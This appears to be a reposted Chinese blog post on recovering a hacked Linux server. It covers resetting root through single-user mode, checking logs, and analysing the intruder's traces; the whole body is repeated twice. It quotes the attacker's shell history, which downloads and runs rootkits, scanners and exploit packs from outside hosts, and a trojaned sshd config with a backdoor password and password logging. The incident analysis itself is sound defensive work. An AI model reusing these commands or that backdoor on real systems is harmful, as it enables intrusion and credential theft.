linux系统被黑,修复root密码,日志跟踪
2009-11-28 01:20
267 查看
场景描述:
异常现象发生:用原先的系统用户密码,无法登录系统.后跟踪日志发现密码被修改.
问题处理:
可用类似于忘记linux的root用户密码方式,解决该问题
可参考:http://www.hacker.cn/Get/linux/0591610385163745.shtml
http://safe.csdn.net/n/20090729/3701.html
1.启动linux,大概在2秒中吧!就这样的界面!按三下键盘E
第一次,进入倒计时时按E键
(注意,要确保BIOS开启对键盘的支持,本人键盘使用的是usb接口,bios设置中有一项是否让Usb支持键盘,需要改成enable)
2.先择如下项目,确定后,按E键.
root (hd0,0)
kernel /vmlinux-****** ro root=/dev/Volgroup00/logvol00 rhgb quiet (这个是选中项)
initrd /initrd**.img
3.按第三下E键进入
我们输入一句命令 / 1
(记得:输入“斜杠”后按一下“空格”在输入1,接下去就按“回车键”)
此时按下键盘“B”进入“
注意,本人处理时发生如下异常
Kernel Panic - not syncing:Attempted to kill init !
将上述写法改成
kernel /vmlinux-****** single ro root=/dev/Volgroup00/logvol00
4.完成上述操作之后
所谓的linux终端(相当windows里面的DOS窗口)
提示sh3.1#
.输入命令 passwd root (回车)
.输入密码 (回车)
.再次输入密码确认 (回车)
输入reboot(重启linux操作系统)(回车)
这样就将root密码修改完成,以后就可以用新密码登录了.
====================================================
linux安全日志查看,参考
http://linux.vbird.org/linux_basic/0570syslog/0570syslog.php
/var/log/secure:記錄登入系統存取資料的檔案,例如 pop3, ssh, telnet, ftp 等都會記錄在此檔案中;
/var/log/wtmp:記錄登入者的訊息資料,由於本檔案已經被編碼過,所以必須使用 last 這個指令來取出檔案的內容;
/var/log/messages:這個檔案相當的重要,幾乎系統發生的錯誤訊息(或者是重要的資訊)都會記錄在這個檔案中;
/var/log/boot.log:記錄開機或者是一些服務啟動的時候,所顯示的啟動或關閉訊息;
/var/log/maillog 或 /var/log/mail/*:紀錄郵件存取或往來( sendmail 與 pop3 )的使用者記錄;
/var/log/cron:這個是用來記錄 crontab 這個例行性服務的內容的!
/var/log/httpd, /var/log/news, /var/log/mysqld.log, /var/log/samba, /var/log/procmail.log: 分別是幾個不同的網路服務的記錄檔啦!
发现比较不认识两个ip,查询后(http://www.ip138.com/)发现是国外的.
195.144.12.5
195.197.175.21
====================分析hacker操作日志============================
查看用户操作记录 .bash_history
uprime
uptime
wget excess.conf-team.com/erk.tgz
tar xvf erk.tgz rm -rf erk.tgz
cd ssh ./inst
passwd root
passwd root
ifconfig /all
ifconfig
passwd root
查看另一个用户操作记录 bash_history
exit
w
cat /proc/cpuinfo
wget http://mirc.go.ro/delles.tgz
tar xzvf delles.tgz
cd delles chmod +x * ./screen
w
wget freewebtown.com/nvpcraiova/jocker.tgz
curl -O freewebtown.com/nvpcraiova/jocker.tgz
wget bagabond.tripod.com/scaner.tgz
wget serpe.3x.ro/bufu.jpg
tar xzvf bufu.jpg
cd ./-/
chmod +x *
./go 130.111
uname -a;w
cat /proc/cpuinfo
exit
passwd root
uptime
ls
wget http://www.securityfocus.com/data/vulnerabilities/exploits/enlightenment-091009.tgz
tar xzvf enlightenment-091009.tgz
cd enlightenment
./run_exploits.sh
w
wget pibo.com/.x/scan/loveru.tar
tar -xzvf loveru.tar
cd loveru chmod +x *
./x 94.188 w
ls -a
cat /proc/cpuinfo
passwd
ls -a
ps -x
cd /tmp
ls -a
wget members.lycos.co.uk/mariusrf/ovi.tar.gz
tar xvf ovi.tar.gz
cd .img
chmod +x *
./start iubire-interzisa
=======这个是ssh文件中查到一个存储用户信息的表=======================
#define BACKDOORPASSWD "admir070738539"
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE "/usr/share/sshd.sync"
#define EMAIL "cipi_ripi_16@hotmail.com"
int backdoor_active;
异常现象发生:用原先的系统用户密码,无法登录系统.后跟踪日志发现密码被修改.
问题处理:
可用类似于忘记linux的root用户密码方式,解决该问题
可参考:http://www.hacker.cn/Get/linux/0591610385163745.shtml
http://safe.csdn.net/n/20090729/3701.html
1.启动linux,大概在2秒中吧!就这样的界面!按三下键盘E
第一次,进入倒计时时按E键
(注意,要确保BIOS开启对键盘的支持,本人键盘使用的是usb接口,bios设置中有一项是否让Usb支持键盘,需要改成enable)
2.先择如下项目,确定后,按E键.
root (hd0,0)
kernel /vmlinux-****** ro root=/dev/Volgroup00/logvol00 rhgb quiet (这个是选中项)
initrd /initrd**.img
3.按第三下E键进入
我们输入一句命令 / 1
(记得:输入“斜杠”后按一下“空格”在输入1,接下去就按“回车键”)
此时按下键盘“B”进入“
注意,本人处理时发生如下异常
Kernel Panic - not syncing:Attempted to kill init !
将上述写法改成
kernel /vmlinux-****** single ro root=/dev/Volgroup00/logvol00
4.完成上述操作之后
所谓的linux终端(相当windows里面的DOS窗口)
提示sh3.1#
.输入命令 passwd root (回车)
.输入密码 (回车)
.再次输入密码确认 (回车)
输入reboot(重启linux操作系统)(回车)
这样就将root密码修改完成,以后就可以用新密码登录了.
====================================================
linux安全日志查看,参考
http://linux.vbird.org/linux_basic/0570syslog/0570syslog.php
/var/log/secure:記錄登入系統存取資料的檔案,例如 pop3, ssh, telnet, ftp 等都會記錄在此檔案中;
/var/log/wtmp:記錄登入者的訊息資料,由於本檔案已經被編碼過,所以必須使用 last 這個指令來取出檔案的內容;
/var/log/messages:這個檔案相當的重要,幾乎系統發生的錯誤訊息(或者是重要的資訊)都會記錄在這個檔案中;
/var/log/boot.log:記錄開機或者是一些服務啟動的時候,所顯示的啟動或關閉訊息;
/var/log/maillog 或 /var/log/mail/*:紀錄郵件存取或往來( sendmail 與 pop3 )的使用者記錄;
/var/log/cron:這個是用來記錄 crontab 這個例行性服務的內容的!
/var/log/httpd, /var/log/news, /var/log/mysqld.log, /var/log/samba, /var/log/procmail.log: 分別是幾個不同的網路服務的記錄檔啦!
发现比较不认识两个ip,查询后(http://www.ip138.com/)发现是国外的.
195.144.12.5
195.197.175.21
====================分析hacker操作日志============================
查看用户操作记录 .bash_history
uprime
uptime
wget excess.conf-team.com/erk.tgz
tar xvf erk.tgz rm -rf erk.tgz
cd ssh ./inst
passwd root
passwd root
ifconfig /all
ifconfig
passwd root
查看另一个用户操作记录 bash_history
exit
w
cat /proc/cpuinfo
wget http://mirc.go.ro/delles.tgz
tar xzvf delles.tgz
cd delles chmod +x * ./screen
w
wget freewebtown.com/nvpcraiova/jocker.tgz
curl -O freewebtown.com/nvpcraiova/jocker.tgz
wget bagabond.tripod.com/scaner.tgz
wget serpe.3x.ro/bufu.jpg
tar xzvf bufu.jpg
cd ./-/
chmod +x *
./go 130.111
uname -a;w
cat /proc/cpuinfo
exit
passwd root
uptime
ls
wget http://www.securityfocus.com/data/vulnerabilities/exploits/enlightenment-091009.tgz
tar xzvf enlightenment-091009.tgz
cd enlightenment
./run_exploits.sh
w
wget pibo.com/.x/scan/loveru.tar
tar -xzvf loveru.tar
cd loveru chmod +x *
./x 94.188 w
ls -a
cat /proc/cpuinfo
passwd
ls -a
ps -x
cd /tmp
ls -a
wget members.lycos.co.uk/mariusrf/ovi.tar.gz
tar xvf ovi.tar.gz
cd .img
chmod +x *
./start iubire-interzisa
=======这个是ssh文件中查到一个存储用户信息的表=======================
#define BACKDOORPASSWD "admir070738539"
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE "/usr/share/sshd.sync"
#define EMAIL "cipi_ripi_16@hotmail.com"
int backdoor_active;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Linux 系统的单用户模式、修复模式、跨控制台登录在系统修复中的运用及突破root密码的方法
- 如何修复linux系统的Root密码
- 双系统配置与简单的linux系统修复(boot分区,root密码等)
- Linux故障处理(二)更改root密码和修复文件系统
- 在Linux系统环境下修改MySQL的root密码
- Linux系统忘了MySQL的root用户密码怎么办
- Linux系统忘了MySQL的root用户密码怎么办
- Linux系统忘了MySQL的root用户密码怎么办
- 远程修改Linux系统VPS服务器Root用户密码教程
- Linux系统默认root用户忘记密码重置
- 在Linux系统环境下修改MySQL的root密码
- Linux系统中忘记root密码
- Linux 系统下MySQL忘记root密码解决办法
- 修复Linux操作系统的Root密码(图解)
- linux中日志分析及系统故障的修复
- Linux系统忘记root密码
- Linux系统忘了MySQL的root用户密码怎么办
- Linux系统忘了MySQL的root用户密码怎么办
- Linux系统忘了MySQL的root用户密码怎么办
- 各种UNIX系统下root密码的修复